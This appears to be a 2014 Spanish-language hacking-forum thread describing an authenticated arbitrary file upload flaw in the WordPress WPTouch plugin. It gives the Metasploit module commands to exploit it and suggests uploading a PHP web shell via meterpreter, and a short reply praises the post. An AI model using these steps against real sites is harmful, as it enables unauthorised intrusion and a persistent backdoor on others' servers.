comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Wordpress WPTouch Authenticated File Upload

  • 1 Respuestas
  • 2226 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ZanGetsu

  • *
  • Underc0der
  • Mensajes: 325
  • Actividad:
    1.67%
  • Reputación 0
  • I ZanGetsu
    • Ver Perfil
  • Skype: thenicox
  • Twitter: black_zangetsu
« en: Agosto 31, 2014, 11:23:09 pm »
El plugin para Wordpress WPTouch contiene una vulnerabilidad de carga de archivos auhtenticated. A-nonce wp (token CSRF) se crea en la página de índice backend y la misma razón se utiliza en el manejo de la carga de archivos a través de ajax el plugin. Mediante el envío de la nonce capturado con la carga, podemos subir archivos arbitrarios a la carpeta de carga. Debido a que el plug-in también utiliza su propio mecanismo de carga de archivos en lugar de la API de wordpress es posible subir cualquier tipo de archivo. El usuario proporcionado no necesita derechos especiales, y los usuarios con rol de "Colaborador" pueden ser objeto de abuso.

Version Vulnerable : 3.4.3
Parchado : SI

Uso :

Código: [Seleccionar]
msf > use exploit/unix/webapp/wp_wptouch_file_upload     
msf exploit(wp_wptouch_file_upload) > show targets           
...targets...
msf exploit(wp_wptouch_file_upload) > set TARGET <target-id>     
msf exploit(wp_wptouch_file_upload) > show options           
...show and set options...
msf exploit(wp_wptouch_file_upload) > exploit

Se debe tener un user y password para poder iniciar el exploit, no es necesario que sea de adm puede ser un login normal, luego iniciaremos el
set USER, Set Password, set Rhost y set TARGETURI,





Luego un upload en meterpreter para subir shell.php





PD: no tenia mas shells que esa a mano xD

Saludos !

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5409
  • Actividad:
    20%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Septiembre 01, 2014, 08:41:26 am »
Muy buena bro!!
Excelente aporte!!

Muchisimas gracias!

ANTRAX


 

¿Te gustó el post? COMPARTILO!



WPScan Wordpress Security - Vulnerability Scanning

Iniciado por Pr0ph3t

Respuestas: 1
Vistas: 2655
Último mensaje Junio 08, 2012, 01:24:55 pm
por CalebBucker
Pruebas de vulnerabilidad de WordPress con Nmap

Iniciado por puntoCL

Respuestas: 0
Vistas: 509
Último mensaje Noviembre 11, 2018, 11:25:17 pm
por puntoCL
Análizando servidores web de Joomla y Wordpress

Iniciado por M5f3r0

Respuestas: 4
Vistas: 3287
Último mensaje Agosto 19, 2013, 07:38:13 pm
por Alvares97
Wordpress Brute Force

Iniciado por ANTRAX

Respuestas: 4
Vistas: 3545
Último mensaje Septiembre 03, 2015, 02:28:31 pm
por Payasako
Plecost: WordPress Pentest

Iniciado por CalebBucker

Respuestas: 3
Vistas: 2899
Último mensaje Junio 07, 2012, 10:28:51 am
por isic